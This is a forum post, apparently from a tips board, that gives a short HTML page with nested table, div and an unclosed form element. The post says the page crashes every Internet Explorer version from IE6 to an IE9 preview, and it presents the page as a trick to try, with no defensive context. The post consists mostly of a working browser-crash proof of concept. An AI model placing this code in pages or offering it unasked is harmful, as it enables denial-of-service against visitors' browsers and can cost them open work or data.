Crash Any Version of Internet Explorer with Simple HTML

chief

Prime VIP
How to Crash Any Version of Internet Explorer with Simple HTML

image349-1.png


Simply open up notepad or another text editor, paste in the following, and save it as SomeFilename.html.

Code:
<html><head>
<style type="text/css">
#a {
        margin:0 10px 10px;
}

#b {
        width:100%;
}

</style>
<title>IE Crasher</title>
</head>
<body>
<table><tr><td>
<div id="a">
<form id="b">
<input type="text" name="test"/>
</div>
</td><td width="1"></td></tr></table>
</body></html>

It should end up looking something like this:

image350-1.png


Then open it up in Internet Explorer, and BOOM! IE is dead.

image351-1.png


It seems to crash just about every single version of IE, from IE6 even up to the latest Internet Explorer 9 platform preview that was released earlier today.
 
Top